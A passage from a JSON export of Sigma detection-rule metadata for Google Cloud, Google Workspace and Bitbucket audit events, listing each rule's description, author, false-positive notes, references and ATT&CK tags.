"https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_service_account_modified.yml" ], "tags": [ "attack.impact" ] }, "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", "value": "Google Cloud Service Account Modified" }, { "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-13", "falsepositive": [ "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", "Exceptions can be added to this rule to filter expected behavior." ], "filename": "gcp_firewall_rule_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", "value": "Google Cloud Firewall Modified or Deleted" }, { "description": "Detects when storage bucket is modified or deleted in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-14", "falsepositive": [ "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_bucket_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/storage/docs/json_api/v1/buckets", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_bucket_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", "value": "Google Cloud Storage Buckets Modified or Deleted" }, { "description": "Detects when an access policy that is applied to a GCP cloud resource is deleted.\nAn adversary would be able to remove access policies to gain access to a GCP cloud resource.\n", "meta": { "author": "Bryan Lim", "creation_date": "2024-01-12", "falsepositive": [ "Legitimate administrative activities" ], "filename": "gcp_access_policy_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/logging/docs/reference/audit/auditlog/rest/Shared.Types/AuditLog", "https://cloud.google.com/access-context-manager/docs/audit-logging", "https://cloud.google.com/logging/docs/audit/understanding-audit-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_access_policy_deleted.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32438676-1dba-4ac7-bf69-b86cba995e05", "value": "GCP Access Policy Deleted" }, { "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-16", "falsepositive": [ "VPN Tunnel being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_vpn_tunnel_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", "value": "Google Cloud VPN Tunnel Modified or Deleted" }, { "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-13", "falsepositive": [ "Full Network Packet Capture may be done by a system or network administrator.", "If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_full_network_traffic_packet_capture.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_full_network_traffic_packet_capture.yml" ], "tags": [ "attack.collection", "attack.t1074" ] }, "related": [ { "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", "value": "Google Full Network Traffic Packet Capture" }, { "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "gcp_dns_zone_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/dns/docs/reference/v1/managedZones", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_dns_zone_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", "value": "Google Cloud DNS Zone Modified or Deleted" }, { "description": "Detect when a Cloud SQL DB has been modified or deleted.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-10-15", "falsepositive": [ "SQL Database being modified or deleted may be performed by a system administrator.", "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_sql_database_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_sql_database_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", "value": "Google Cloud SQL Database Modified or Deleted" }, { "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-25", "falsepositive": [ "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", "If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_kubernetes_admission_controller.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_admission_controller.yml" ], "tags": [ "attack.persistence", "attack.t1078", "attack.credential-access", "attack.t1552", "attack.t1552.007" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", "value": "Google Cloud Kubernetes Admission Controller" }, { "description": "Identifies when sensitive information is re-identified in google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-15", "falsepositive": [ "Unknown" ], "filename": "gcp_dlp_re_identifies_sensitive_information.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_dlp_re_identifies_sensitive_information.yml" ], "tags": [ "attack.impact", "attack.t1565" ] }, "related": [ { "dest-uuid": "ac9e6b22-11bf-45d7-9181-c1cb08360931", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", "value": "Google Cloud Re-identifies Sensitive Information" }, { "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-09", "falsepositive": [ "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_kubernetes_rolebinding.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", "https://github.com/elastic/detection-rules/pull/1267", "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_rolebinding.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", "value": "Google Cloud Kubernetes RoleBinding" }, { "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-11-22", "falsepositive": [ "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", "If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_kubernetes_cronjob.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/kubernetes-engine/docs", "https://kubernetes.io/docs/concepts/workloads/controllers/job/", "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_kubernetes_cronjob.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.execution" ] }, "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", "value": "Google Cloud Kubernetes CronJob" }, { "description": "Identifies when a service account is disabled or deleted in Google Cloud.", "meta": { "author": "Austin Songer @austinsonger", "creation_date": "2021-08-14", "falsepositive": [ "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], "filename": "gcp_service_account_disabled_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_service_account_disabled_or_deleted.yml" ], "tags": [ "attack.impact", "attack.t1531" ] }, "related": [ { "dest-uuid": "b24e2a20-3b3d-4bf0-823b-1ed765398fb0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", "value": "Google Cloud Service Account Disabled or Deleted" }, { "description": "Detects the deployment of workloads that are deployed by using the break-glass flag to override Binary Authorization controls.\n", "meta": { "author": "Bryan Lim", "creation_date": "2024-01-12", "falsepositive": [ "Unknown" ], "filename": "gcp_breakglass_container_workload_deployed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://cloud.google.com/binary-authorization", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/audit/gcp_breakglass_container_workload_deployed.yml" ], "tags": [ "attack.defense-evasion", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "76737c19-66ee-4c07-b65a-a03301d1573d", "value": "GCP Break-glass Container Workload Deployed" }, { "description": "Detects when multi-factor authentication (MFA) is disabled.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-26", "falsepositive": [ "MFA may be disabled and performed by a system administrator." ], "filename": "gcp_gworkspace_mfa_disabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_mfa_disabled.yml" ], "tags": [ "attack.impact" ] }, "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", "value": "Google Workspace MFA Disabled" }, { "description": "Detects when an a role privilege is deleted in Google Workspace.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-24", "falsepositive": [ "Unknown" ], "filename": "gcp_gworkspace_role_privilege_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_role_privilege_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", "value": "Google Workspace Role Privilege Deleted" }, { "description": "Detects when an an application is removed from Google Workspace.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-26", "falsepositive": [ "Application being removed may be performed by a System Administrator." ], "filename": "gcp_gworkspace_application_removed.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_application_removed.yml" ], "tags": [ "attack.impact" ] }, "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", "value": "Google Workspace Application Removed" }, { "description": "Detects when an access level is changed for a Google workspace application.\nAn access level is part of BeyondCorp Enterprise which is Google Workspace's way of enforcing Zero Trust model.\nAn adversary would be able to remove access levels to gain easier access to Google workspace resources.\n", "meta": { "author": "Bryan Lim", "creation_date": "2024-01-12", "falsepositive": [ "Legitimate administrative activities changing the access levels for an application" ], "filename": "gcp_gworkspace_application_access_levels_modified.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-application-settings", "https://support.google.com/a/answer/9261439", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_application_access_levels_modified.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098.003" ] }, "related": [ { "dest-uuid": "2dbbdcd5-92cf-44c0-aea2-fe24783a6bc3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "22f2fb54-5312-435d-852f-7c74f81684ca", "value": "Google Workspace Application Access Level Modified" }, { "description": "Detects when an API access service account is granted domain authority.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "gcp_gworkspace_granted_domain_api_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_granted_domain_api_access.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", "value": "Google Workspace Granted Domain API Access" }, { "description": "Detects when an Google Workspace user is granted admin privileges.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-23", "falsepositive": [ "Google Workspace admin role privileges, may be modified by system administrators." ], "filename": "gcp_gworkspace_user_granted_admin_privileges.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_user_granted_admin_privileges.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", "value": "Google Workspace User Granted Admin Privileges" }, { "description": "Detects when an a role is modified or deleted in Google Workspace.", "meta": { "author": "Austin Songer", "creation_date": "2021-08-24", "falsepositive": [ "Unknown" ], "filename": "gcp_gworkspace_role_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "gcp", "refs": [ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gworkspace/gcp_gworkspace_role_modified_or_deleted.yml" ], "tags": [ "attack.impact" ] }, "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", "value": "Google Workspace Role Modified or Deleted" }, { "description": "Detects user authentication failure events.\nPlease note that this rule can be noisy and it is recommended to use with correlation based on \"author.name\" field.\n", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user wrong password attempts." ], "filename": "bitbucket_audit_user_login_failure_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_login_failure_detected.yml" ], "tags": [ "attack.defense-evasion", "attack.credential-access", "attack.t1078.004", "attack.t1110" ] }, "related": [ { "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "70ed1d26-0050-4b38-a599-92c53d57d45a", "value": "Bitbucket User Login Failure" }, { "description": "Detects when secret scanning rule is deleted for the project or repository.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_secret_scanning_rule_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_secret_scanning_rule_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff91e3f0-ad15-459f-9a85-1556390c138d", "value": "Bitbucket Secret Scanning Rule Deleted" }, { "description": "Detects global permissions change activity.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_global_permissions_change_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/global-permissions-776640369.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_permissions_change_detected.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aac6c4f4-87c7-4961-96ac-c3fd3a42c310", "value": "Bitbucket Global Permission Changed" }, { "description": "Detects Bitbucket global SSH access configuration changes.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_global_ssh_settings_change_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/enable-ssh-access-to-git-repositories-776640358.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_ssh_settings_change_detected.yml" ], "tags": [ "attack.lateral-movement", "attack.defense-evasion", "attack.t1562.001", "attack.t1021.004" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16ab6143-510a-44e2-a615-bdb80b8317fc", "value": "Bitbucket Global SSH Settings Changed" }, { "description": "Detects user data export activity.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_user_details_export_attempt_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://support.atlassian.com/security-and-access-policies/docs/export-user-accounts", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_user_details_export_attempt_detected.yml" ], "tags": [ "attack.collection", "attack.reconnaissance", "attack.discovery", "attack.t1213", "attack.t1082", "attack.t1591.004" ] }, "related": [ { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cc723aff-ec88-40e3-a224-5af9fd983cc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5259cbf2-0a75-48bf-b57a-c54d6fabaef3", "value": "Bitbucket User Details Export Attempt Detected" }, { "description": "Detects unauthorized access attempts to a resource.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Access attempts to non-existent repositories or due to outdated plugins. Usually \"Anonymous\" user is reported in the \"author.name\" field in most cases." ], "filename": "bitbucket_audit_unauthorized_access_detected.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_access_detected.yml" ], "tags": [ "attack.resource-development", "attack.t1586" ] }, "related": [ { "dest-uuid": "81033c3b-16a4-46e4-8fed-9b030dd03c4a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7215374a-de4f-4b33-8ba5-70804c9251d3", "value": "Bitbucket Unauthorized Access To A Resource" }, { "description": "Detects changes to the bitbucket audit log configuration.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_log_configuration_update_detected.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/view-and-configure-the-audit-log-776640417.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_log_configuration_update_detected.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6aa12161-235a-4dfb-9c74-fe08df8d8da1", "value": "Bitbucket Audit Log Configuration Updated" }, { "description": "Detects Bitbucket global secret scanning rule deletion activity.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_global_secret_scanning_rule_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_global_secret_scanning_rule_deleted.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e16cf0f0-ee88-4901-bd0b-4c8d13d9ee05", "value": "Bitbucket Global Secret Scanning Rule Deleted" }, { "description": "Detects when full data export is attempted.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate user activity." ], "filename": "bitbucket_audit_full_data_export_triggered.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/adminjiraserver0811/importing-and-exporting-data-1019391889.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_full_data_export_triggered.yml" ], "tags": [ "attack.collection", "attack.t1213.003" ] }, "related": [ { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "195e1b9d-bfc2-4ffa-ab4e-35aef69815f8", "value": "Bitbucket Full Data Export Triggered" }, { "description": "Detects when full data export is attempted an unauthorized user.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Unlikely" ], "filename": "bitbucket_audit_unauthorized_full_data_export_triggered.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "bitbucket", "refs": [ "https://confluence.atlassian.com/bitbucketserver/audit-log-events-776640423.html", "https://confluence.atlassian.com/bitbucketserver/secret-scanning-1157471613.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/bitbucket/audit/bitbucket_audit_unauthorized_full_data_export_triggered.yml" ], "tags": [ "attack.collection", "attack.resource-development", "attack.t1213.003", "attack.t1586" ] }, "related": [ { "dest-uuid": "cff94884-3b1c-4987-a70b-6d5643c621c3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "81033c3b-16a4-46e4-8fed-9b030dd03c4a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34d81081-03c9-4a7f-91c9-5e46af625cde", "value": "Bitbucket Unauthorized Full Data Export Triggered" }, { "description": "Detects when a secret scanning allowlist rule is added for projects.", "meta": { "author": "Muhammad Faisal (@faisalusuf)", "creation_date": "2024-02-25", "falsepositive": [ "Legitimate 